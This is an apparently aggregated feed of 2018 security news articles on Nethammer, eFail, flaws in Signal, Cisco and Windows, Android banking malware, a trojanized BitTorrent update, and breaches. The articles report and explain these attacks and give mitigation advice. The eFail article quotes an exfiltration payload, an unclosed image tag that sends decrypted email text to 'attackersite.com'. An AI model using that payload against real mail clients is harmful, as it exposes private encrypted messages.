Nethammer—Exploiting DRAM Rowhammer Bug Through Network Requests

Last week, we reported about the first network-based remote Rowhammer attack, dubbed Throwhammer, which involves the exploitation a known vulnerability in DRAM through network cards using remote direct memory access (RDMA) channels.

However, a separate team of security researchers has now demonstrated a second network-based remote Rowhammer technique that can be used to attack systems using uncached memory or flush instruction while processing the network requests.

The research was carried out by researchers who discovered Meltdown and Spectre CPU vulnerabilities, which is independent of the Amsterdam researchers who presented a series of Rowhammer attacks, including Throwhammer published last week.

If you are unaware, Rowhammer is a critical issue with recent generation dynamic random access memory (DRAM) chips in which repeatedly accessing a row of memory can cause “bit flipping” in an adjacent row, allowing attackers to change the contents of the memory.

The issue has since been exploited in a number of ways to escalate an attacker’s privilege to kernel level and achieve remote code execution on the vulnerable systems, but the attacker needed access to the victim’s machine.

However, the new Rowhammer attack technique, dubbed Nethammer, can be used to execute arbitrary code on the targeted system by rapidly writing and rewriting memory used for packet processing, which would be possible only with a fast network connection between the attacker and victim.

This causes a high number of memory accesses to the same set of memory locations, which eventually induces disturbance errors in DRAM and causes memory corruption by unintentionally flipping the DRAM bit-value.

The resulting data corruption can then be manipulated by the attacker to gain control over the victim’s system.

“To mount a Rowhammer attack, memory accesses need to be directly served by the main memory. Thus, an attacker needs to make sure that the data is not stored in the cache,” the researcher paper [PDF] reads.

Since caching makes an attack difficult, the researchers developed ways that allowed them to bypass the cache and attack directly into the DRAM to cause the row conflicts in the memory cells required for the Rowhammer attack.

Researchers tested Nethammer for the three cache-bypass techniques:

  • A kernel driver that flushes (and reloads) an address whenever a packet is received.
  • Intel Xeon CPUs with Intel CAT for fast cache eviction
  • Uncached memory on an ARM-based mobile device.

All three scenarios are possible, researchers showed.

In their experimental setup, researchers were successfully able to induce a bit flip every 350 ms by sending a stream of UDP packets with up to 500 Mbit/s to the target system.

Since the Nethammer attack technique does not require any attack code in contrast to a regular Rowhammer attack, for example, no attacker-controlled code on the system, most countermeasures do not prevent this attack.

Since Rowhammer exploits a computer hardware weakness, no software patch can completely fix the issue. Researchers believe the Rowhammer threat is not only real but also has potential to cause real, severe damage.

For more in-depth details on the new attack technique, you can head on to this paper, titled “Nethammer: Inducing Rowhammer Faults through Network Requests,” published by the researchers earlier this week.

Go to Source

Here’s How eFail Attack Against PGP and S/MIME Encrypted Emails Works

With a heavy heart, security researchers have early released the details of a set of vulnerabilities discovered in email clients for two widely used email encryption standards—PGP and S/MIME—after someone leaked their paper on the Internet, which was actually scheduled for tomorrow.

PGP and S/MIME are popular end-to-end encryption standards used to encrypt emails in a way that no one, not even the company, government, or cyber criminals, can spy on your communication.

Before explaining how the vulnerability works, it should be noted that the flaw doesn’t reside in the email encryption standards itself; instead, it affects a few email clients/plugins that incorrectly implemented the technologies.

Dubbed eFail by the researchers, the vulnerabilities, as described in our previous early-warning article, could allow potential attackers to decrypt the content of your end-to-end encrypted emails in plaintext, even for messages sent in the past.

According to the paper released by a team of European security researchers, the vulnerabilities exist in the way encrypted email clients handle HTML emails and external resources, like loading of images, styles from external URLs.

Here’s How the eFail Attack Works:

pgp-encrypted-email

Email clients are usually configured to automatically decrypt the content of encrypted emails you receive, but if your client is also configured to load external resources automatically, attackers can abuse this behavior to steal messages in plaintext just by sending you a modified version of the same encrypted email content.

The attack vector requires injected plaintext into the encrypted mail, and then using the exploit, it will exfiltrate the originally encrypted data as soon as any recipient’s mail client accesses (or decrypts) the message

It should be noted that to perform an eFail attack, an attacker must have access to your encrypted emails, which is then modified in the following way and send back to you in order to trick your email client into revealing the secret message to the remote attacker without alerting you.

As described in the proof-of-concept attack released by the researchers, the attacker uses one of the encrypted messages you are supposed to receive or might have already received and then turns it into a multipart HTML email message, as well as forges the return address, so it appears to come from the original sender.

In the newly composed email, the attacker adds an unclosed image tag, like this <img src=”https://attackersite.com/ just before the encrypted content and ends it by adding the end of the image tag, like this: .jpg”>, as clearly shown in the screenshot.

When your vulnerable email client receives this message, it decrypts the encrypted part of the message given in the middle, and then automatically tries to render the HTML content, i.e., the image tag with all the decrypted text as the new name of the image, as shown below.

pgp-smime-email-encryption

Since your email client will try to load the image from the attacker-controlled server, the attacker can capture this incoming request, where the filename contains the full content of the original encrypted email in plaintext.

Although PGP has been designed to show you a warning note if the integrity of your email is compromised, a few email clients do not display these warnings, allowing any potential attackers to perform eFail attacks successfully.

How To Prevent Against eFail Attacks

email-hacking

Generally, it is a very tough job for an advisory to even intercept your encrypted emails, but for people desperately using email encryption always attract well-resourced and sophisticated attackers.

Ditching the use of PGP or S/MIME to prevent eFail attacks would be stupid advice, as it is quite easy to mitigate the reported issues.

Users can switch to a good email client that always shows a warning when the integrity of the emails is compromised and doesn’t render HTML emails by default to prevent loading of external resources automatically.

Researchers also advise users to adopt an authenticated encryption algorithm for sensitive communication.

The research was conducted by a team of researchers, including Damian Poddebniak, Christian Dresen, Fabian Ising, and Sebastian Schinzel from Munster University of Applied Sciences; Jens Müller, Juraj Somorovsky, and Jörg Schwenk from Ruhr University Bochum; and Simon Friedberger from KU Leuven.

For more in-depth details on the attack technique, you can head on to this informational page about the eFail attack and the paper [PDF] titled, “Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels,” published by the researchers.

Go to Source

Severe Bug Discovered in Signal Messaging App for Windows and Linux

Security researchers have discovered a severe vulnerability in the popular end-to-end encrypted Signal messaging app for Windows and Linux desktops which could allow remote attackers to execute malicious code on recipients system just by sending a message—without requiring any user interaction.

Discovered by Alfredo Ortega, a software security consultant from Argentina, the vulnerability was announcedon Twitter just a few hours ago with a proof-of-concept video, demonstrating how a javascript payload sent over Signal for desktop app successfully got executed on the recipient’s system.

Although technical details of the vulnerability have not been revealed as of now, the issue appears to be a remote code execution vulnerability in Signal or at least something very close to persistent cross-site scripting (XSS) which eventually could allow attackers to inject malicious code onto targeted Windows and Linux systems.

“For the time being, we can only confirm the execution of javascript code. However we are tracking a heap corruption issue, and it’s very likely than the javascript execution could lead to native code execution with additional research.” Ortega told The Hacker News.

Ortega also confirms us that the exploitation of this issue requires chaining a couple of vulnerabilities found by two other security researchers from Argentina, Ivan and Juliano.

“I can confirm that this bug did not exist before and was last introduced because the devs forgot why there was a regex there to begin with. I would like to recommend a comment to this comment if it is not repeated again (TBD),” Ivan said.

At this moment, it is not clear if the primary vulnerability or other chained bugs reside only in the source code of Signal or also in the popular Electron web application framework, the technology on which Signal desktop applications are based.

If the flaw resides in the Electron framework, it might also impact other widely-used desktop applications as well, including Skype, WordPress, and Slack, which also use the same framework.

Moreover, the infosec community is also worried that if this flaw allows remote attackers to steal their secret encryption keys, it would be the worst nightmare for Signal users.

The good news is that the Open Whisper Systems has already addressed the issue and immediately released new versions of Signal app within a few hours after receiving the responsible vulnerability disclosure by the researcher.

The primary vulnerability that triggers the code execution has been patched in Signal stable release version 1.10.1 and pre-release version 1.11.0-beta.3. So, users are advised to update their Signal for desktop applications as soon as possible.

“At this time we are not sure they all [the vulnerabilities chained together] have been fixed” Ortega told The Hacker News.

The latest release also patched a recently disclosed vulnerability in Signal for desktop apps which was exposing disappearing messages in a user-readable database of macOS’s Notification Center, even if they are deleted from the app.

Go to Source

Cybercriminals Hijack Router DNS to Distribute Android Banking Trojan

Security researchers have been warning about an ongoing malware campaign hijacking Internet routers to distribute Android banking malware that steals users’ sensitive information, login credentials and the secret code for two-factor authentication.

In order to trick victims into installing the Android malware, dubbed Roaming Mantis, hackers have been hijacking DNS settings on vulnerable and poorly secured routers.

DNS hijacking attack allows hackers to intercept traffic, inject rogue ads on web-pages and redirect users to phishing pages designed to trick them into sharing their sensitive information like login credentials, bank account details, and more.

Hijacking routers’ DNS for a malicious purpose is not new. Previously we reported about widespread DNSChanger and Switcher—both the malware worked by changing the DNS settings of the wireless routers to redirect traffic to malicious websites controlled by attackers.

Discovered by security researchers at Kaspersky Lab, the new malware campaign has primarily been targeting users in Asian countries, including South Korea, China Bangladesh, and Japan, since February this year.

Once modified, the rogue DNS settings configured by hackers redirect victims to fake versions of legitimate websites they try to visit and displays a pop-up warning message, which says—”To better experience the browsing, update to the latest chrome version.”

android-dns-hijack-banking-malware

It then downloads the Roaming Mantis malware app masquerading as Chrome browser app for Android, which takes permission to collect device’ account information, manage SMS/MMS and making calls, record audio, control external storage, check packages, work with file systems, draw overlay windows and so on.

“The redirection led to the installation of Trojanized applications named facebook.apk and chrome.apk that contained Android Trojan-Banker.”

If installed, the malicious app overlays all other windows immediately to show a fake warning message (in broken English), which reads, “Account No.exists risks, use after certification.”

Roaming Mantis then starts a local web server on the device and launches the web browser to open a fake version of Google website, asking users to fill up their names and date of births.

android-dns-hijack-banking-malware

To convince users into believing that they are handing over this information to Google itself, the fake page displays users’ Gmail email ID configured on their infected Android device, as shown in the screenshots.

“After the user enters their name and date of birth, the browser is redirected to a blank page at http://127.0.0.1:${random_port}/submit,” researchers said. “Just like the distribution page, the malware supports four locales: Korean, Traditional Chinese, Japanese and English.”

Since Roaming Mantis malware app has already gained permission to read and write SMS on the device, it allows attackers to steal the secret verification code for the two-factor authentication for victims’ accounts.

While analysing the malware code, Researchers found reference to popular South Korean mobile banking and gaming applications, as well as a function that tries to detect if the infected device is rooted.

“For attackers, this may indicate that a device is owned by an advanced Android user (a signal to stop messing with the device) or, alternatively, a chance to leverage root access to gain access to the whole system,” the researchers said.

What’s interesting about this malware is that it uses one of the leading Chinese social media websites (my.tv.sohu.com) as its command-and-control server and sends commands to infected devices just via updating the attacker-controlled user profiles.

chinese-android-malware

According to Kaspersky’s Telemetry data, the Roaming Mantis malware was detected more than 6,000 times, though the reports came from just 150 unique users.

You are advised to ensure your router is running the latest version of the firmware and protected with a strong password.

You should also disable router’s remote administration feature and hardcode a trusted DNS server into the operating system network settings.

Go to Source

Casino Gets Hacked Through Its Internet-Connected Fish Tank Thermometer

Internet-connected technology, also known as the Internet of Things (IoT), is now part of daily life, with smart assistants like Siri and Alexa to cars, watches, toasters, fridges, thermostats, lights, and the list goes on and on.

But of much greater concern, enterprises are unable to secure each and every device on their network, giving cybercriminals hold on their network hostage with just one insecure device.

Since IoT is a double-edged sword, it not only poses huge risks to enterprises worldwide but also has the potential to severely disrupt other organisations, or the Internet itself.

There’s no better example than Mirai, the botnet malware that knocked the world’s biggest and most popular websites offline for few hours over a year ago.

We have another great example that showcases how one innocent looking insecure IoT device connected to your network can cause security nightmares.

Nicole Eagan, the CEO of cybersecurity company Darktrace, told attendees at an event in London on Thursday how cybercriminals hacked an unnamed casino through its Internet-connected thermometer in an aquarium in the lobby of the casino.

According to what Eagan claimed, the hackers exploited a vulnerability in the thermostat to get a foothold in the network. Once there, they managed to access the high-roller database of gamblers and “then pulled it back across the network, out the thermostat, and up to the cloud.”

Although Eagan did not disclose the identity of the casino, the incident she was sharing could be of last year, when Darktrace published a report [PDF], referencing to a thermometer hack of this sort on an unnamed casino based in North America.

The adoption of IoT technology raises concerns over new and more imaginative cybersecurity threats, and this incident is a compelling reminder that the IoT devices are theoretically vulnerable to being hacked or compromised.

“There’s a lot of internet of things devices, everything from thermostats, refrigeration systems, HVAC [air conditioning] systems, to people who bring in their Alexa devices into the offices,” said Eagan.
“There’s just a lot of IoT. It expands the attack surface and most of this isn’t covered by traditional defenses.”

Manufacturers majorly focus on performance and usability of IoT devices but ignore security measures and encryption mechanisms, which is why they are routinely being hacked.

Therefore, people can hardly do anything to protect themselves against these kinds of threats, until IoT device manufacturers timely secure and patch every security flaws or loopholes that might be present in their devices.

The best way you can protect is to connect only necessary devices to the network and place them behind a firewall.

Also, keep your operating systems and software up-to-date, make use of a good security product that protects all your devices within the network, and most importantly, educate yourself about IoT products.

Go to Source
Author:

Powered by WPeMatico

Finland’s 3rd Largest Data Breach Exposes 130,000 Users’ Plaintext Passwords

Over 130,000 Finnish citizens have had their credentials compromised in what appears to be third largest data breach ever faced by the country, local media reports.

Finnish Communications Regulatory Authority (FICORA) is warning users of a large-scale data breach in a website maintained by the New Business Center in Helsinki (“Helsingin Uusyrityskeskus”), a company that provides business advice to entrepreneurs and help them create right business plans.

Unknown attackers managed to hack the website (http://liiketoimintasuunnitelma.com) and stole over 130,000 users’ login usernames and passwords, which were stored on the site in plain-text without using any cryptographic hash.

Right after knowing of the breach on 3rd April, the company took down the affected website, which is currently showing “under maintenance” notice with a press release about the incident on its homepage.

“We are very sorry for all the people who have been subjected to crime and who may be affected by mental or financial disadvantages. Unfortunately, we are not yet able to know exactly how many people are and what information this information breaks. We have filed an offense report, and the parties do not need to report to the police separately,” says Jarmo Hyökyvaara, Chairman of the Board of the New Business Center of Helsinki.

“The maintenance and security of our service was the responsibility of our subcontractor, our long-term partner. Unfortunately, the security of the service has not been enough to prevent this kind of attack. This is, in part, our mistake, and as a subscriber and owner of the service we are responsible for this.”

The company also ensures that the detailed information of its customers was stored on a different system, which was not affected by the data breach.

The incident has been reported to the Helsinki police, who is currently investigating the case as a gross fraud.

As soon as the website returns, users who have an account with the affected website are strongly recommended to change their passwords.

Since the plain-text passwords have been exposed to hackers, it would be a great idea for users to change their passwords for any other website, in case they are using identical to the one used on this website.

Go to Source

Critical flaw leaves thousands of Cisco Switches vulnerable to remote hacking

cisco-network-switches-hacking

Security researchers at Embedi have disclosed a critical vulnerability in Cisco IOS Software and Cisco IOS XE Software that could allow an unauthenticated, remote attacker to execute arbitrary code, take full control over the vulnerable network equipment and intercept traffic.

The stack-based buffer overflow vulnerability (CVE-2018-0171) resides due to improper validation of packet data in Smart Install Client, a plug-and-play configuration and image-management feature that helps administrators to deploy (client) network switches easily.

Embedi has published technical details and Proof-of-Concept (PoC) code after Cisco today released patch updates to address this remote code execution vulnerability, which has been given a base Common Vulnerability Scoring System (CVSS) score of 9.8 (critical).

Researchers found a total of 8.5 million devices with the vulnerable port open on the Internet, leaving approximately 250,000 unpatched devices open to hackers.

To exploit this vulnerability, an attacker needs to send a crafted Smart Install message to an affected device on TCP port 4786, which is opened by default.

“To be more precise, the buffer overflow takes place in the function smi_ibc_handle_ibd_init_discovery_msg” and “because the size of the data copied to a fixed-size buffer is not checked, the size and data are taken directly from the network packet and are controlled by an attacker,” Cisco explain in its advisory.

The vulnerability can also result in a denial-of-service condition (watchdog crash) by triggering indefinite loop on the affected devices.

Researchers demonstrated the vulnerability at a conference in Hong Kong after reporting it to Cisco in May 2017.

Video Demonstrations of the Attack:

In their first demonstration, as shown in the video below, researchers targeted Cisco Catalyst 2960 switch to reset/change the password and entered privileged EXEC mode:

In their second demo, researchers exploited the flaw to successfully intercept the traffic between other devices connected to the vulnerable switch and the Internet.

Affected Hardware and Software:

The vulnerability was tested on Catalyst 4500 Supervisor Engines, Cisco Catalyst 3850 Series Switches, and Cisco Catalyst 2960 Series Switches devices, as well as all devices that fall into the Smart Install Client type are potentially vulnerable, including:

  • Catalyst 4500 Supervisor Engines
  • Catalyst 3850 Series
  • Catalyst 3750 Series
  • Catalyst 3650 Series
  • Catalyst 3560 Series
  • Catalyst 2960 Series
  • Catalyst 2975 Series
  • IE 2000
  • IE 3000
  • IE 3010
  • IE 4000
  • IE 4010
  • IE 5000
  • SM-ES2 SKUs
  • SM-ES3 SKUs
  • NME-16ES-1G-P
  • SM-X-ES3 SKUs

Cisco fixed the vulnerability in all of its affected products on 28th March 2018, and Embedi published a blog post detailing the vulnerability on 29th March. So, administrators are highly recommended to install free software updates to address the issue as soon as possible.

Go to Source

Windows Remote Assistance Exploit Lets Hackers Steal Sensitive Files

You have always been warned not to share remote access to your computer with untrusted people for any reason—it’s a basic cybersecurity advice, and common sense, right?

But what if, I say you should not even trust anyone who invites or offer you full remote access to their computers.

A critical vulnerability has been discovered in Microsoft’s Windows Remote Assistance (Quick Assist) feature that affects all versions of Windows to date, including Windows 10, 8.1, RT 8.1, and 7, and allows remote attackers to steal sensitive files on the targeted machine.

Windows Remote Assistance is a built-in tool that allows someone you trust to take over your PC (or you to take remote control of others) so they can help you fix a problem from anywhere around the world.

The feature relies on the Remote Desktop Protocol (RDP) to establish a secure connection with the person in need.

However, Nabeel Ahmed of Trend Micro Zero Day Initiative discovered and reported an information disclosure vulnerability (CVE-2018-0878) in Windows Remote Assistance that could allow attackers to obtain information to further compromise the victim’s system.

The vulnerability, which has been fixed by the company in this month’s patch Tuesday, resides in the way Windows Remote Assistance processes XML External Entities (XXE).

The vulnerability affects Microsoft Windows Server 2016, Windows Server 2012 and R2, Windows Server 2008 SP2 and R2 SP1, Windows 10 (both 32- and 64-bit), Windows 8.1 (both 32- and 64-bit) and RT 8.1, and Windows 7 (both 32- and 64-bit).

Exploiting Windows Remote Assistance to Steal Files

Windows-Remote-Assistance

Since a security patch for this vulnerability is now available, the researcher has finally released technical details and proof-of-concept exploit code for the flaw to the public.

In order to exploit this flaw, which resides in MSXML3 parser, the hacker needs to use “Out-of-Band Data Retrieval” attack technique by offering the victim access to his/her computer via Windows Remote Assistance.

While setting up Windows Remote Assistance, the feature gives you two options—Invite someone to help you and Respond to someone who needs help.

Selecting the first option helps users generate an invitation file, i.e. ‘invitation.msrcincident,’ which contains XML data with a lot of parameters and values required for authentication.

Windows Remote Assistance Exploit

Since the parser does not properly validate the content, the attacker can simply send a specially crafted Remote Assistance invitation file containing a malicious payload to the victim, tricking the targeted computer to submit the content of specific files from known locations to a remote server controlled by the attackers.

“The stolen information could be submitted as part of the URL in HTTP request(s) to the attacker. In all cases, an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action,” Microsoft explains.

“This XXE vulnerability can be genuinely used in mass scale phishing attacks targeting individuals believing they are truly helping another individual with an IT problem. Totally unaware that the .msrcincident invitation file could potentially result in loss of sensitive information,” Ahmed warns.

Among patching other critical vulnerabilities fixed this month, Windows users are highly recommended to install the latest update for Windows Remote Assistance as soon as possible.

Go to Source

Trojanized BitTorrent Software Update Hijacked 400,000 PCs Last Week

A massive malware outbreak that last week infected nearly half a million computers with cryptocurrency mining malware in just a few hours was caused by a backdoored version of popular BitTorrent client called MediaGet.

Dubbed Dofoil (also known as Smoke Loader), the malware was found dropping a cryptocurrency miner program as payload on infected Windows computers that mine Electroneum digital coins for attackers using victims’ CPU cycles.

Dofoil campaign that hit PCs in Russia, Turkey, and Ukraine on 6th March was discovered by Microsoft Windows Defender research department and blocked the attack before it could have done any severe damages.

At the time when Windows Defender researchers detected this attack, they did not mention how the malware was delivered to such a massive audience in just 12 hours.

However, after investigation Microsoft today revealed that the attackers targeted the update mechanism of MediaGet BitTorrent software to push its trojanized version (mediaget.exe) to users’ computers.

“A signed mediaget.exe downloads an update.exe program and runs it on the machine to install a new mediaget.exe. The new mediaget.exe program has the same functionality as the original but with additional backdoor capability,” the researchers explain in a blog post published today.

Researchers believe MediaGet that signed update.exe is likely to be a victim of the supply chain attack, similar to CCleaner hack that infected over 2.3 million users with the backdoored version of the software in September 2017.

malware-attack

Also, in this case, the attackers signed the poisoned update.exe with a different certificate and successfully passed the validation required by the legitimate MediaGet.

“The dropped update.exe is a packaged InnoSetup SFX which has an embedded trojanized mediaget.exe, update.exe. When run, it drops a trojanized unsigned version of mediaget.exe.”

Once updated, the malicious BitTorrent software with additional backdoor functionality randomly connects to one (out of four) of its command-and-control (C&C) servers hosted on decentralized Namecoin network infrastructure and listens for new commands.

It then immediately downloads CoinMiner component from its C&C server, and start using victims’ computers mine cryptocurrencies for the attackers.

Using C&C servers, attackers can also command infected systems to download and install additional malware from a remote URL.

The researchers found that the trojanized BitTorrent client, detected by Windows Defender AV as Trojan:Win32/Modimer.A, has 98% similarity to the original MediaGet binary.

Microsoft says behavior monitoring and AI-based machine learning techniques used by its Windows Defender Antivirus software have played an important role to detect and block this massive malware campaign.

Go to Source

CredSSP Flaw in Remote Desktop Protocol Affects All Versions of Windows

A critical vulnerability has been discovered in Credential Security Support Provider protocol (CredSSP) that affects all versions of Windows to date and could allow remote attackers to exploit RDP and WinRM to steal data and run malicious code.

CredSSP protocol has been designed to be used by RDP (Remote Desktop Protocol) and Windows Remote Management (WinRM) that takes care of securely forwarding credentials encrypted from the Windows client to the target servers for remote authentication.

Discovered by researchers at Cybersecurity firm Preempt Security, the issue (CVE-2018-0886) is a logical cryptographic flaw in CredSSP that can be exploited by a man-in-the-middle attacker with Wi-Fi or physical access to the network to steal session authentication data and perform a Remote Procedure Call attack.

When a client and server authenticate over RDP and WinRM connection protocols, a man-in-the-middle attacker can execute remote commands to compromise enterprise networks.

“An attacker which have stolen a session from a user with sufficient privileges could run different commands with local admin privileges. This is especially critical in case of domain controllers, where most Remote Procedure Calls (DCE/RPC) are enabled by default,” says Yaron Zinar, lead security researcher for Preempt.

“This could leave enterprises vulnerable to a variety of threats from attackers including lateral movement and infection on critical servers or domain controllers.”

Since RDP is the most popular application to perform remote logins and almost all enterprise customers are using RDP, it makes most networks vulnerable to this security issue.

Preempt Researchers discovered and reported this previously unknown remote code execution vulnerability to Microsoft in August last year, but the tech giant issued a fix for the protocol just today as part of its Patch Tuesday release—that’s almost after 7 months of reporting.

To defend yourself and your organizations against the CredSSP exploit, users are recommended to patch their workstations and servers using available updates from the Microsoft.

Though researchers also warned that patching alone is not sufficient to prevent this attack, IT professionals are also required to make some configuration to apply the patch and be protected.

Blocking the relevant application ports including RDP and DCE/RPC would also thwart the attack, but researchers say this attack could even be implemented in different ways, using different protocols.

Therefore, to better protect your network, it is a good idea to decrease the use of privileged account as much as possible and instead use non-privileged accounts whenever applicable.

As part of March 2018 Patch Tuesday, Microsoft has also released security patches for its other products, including Microsoft IE and Edge browser, Windows OS, Microsoft Office, PowerShell, Core ChakraCore, as well as Adobe Flash player.

Go to Source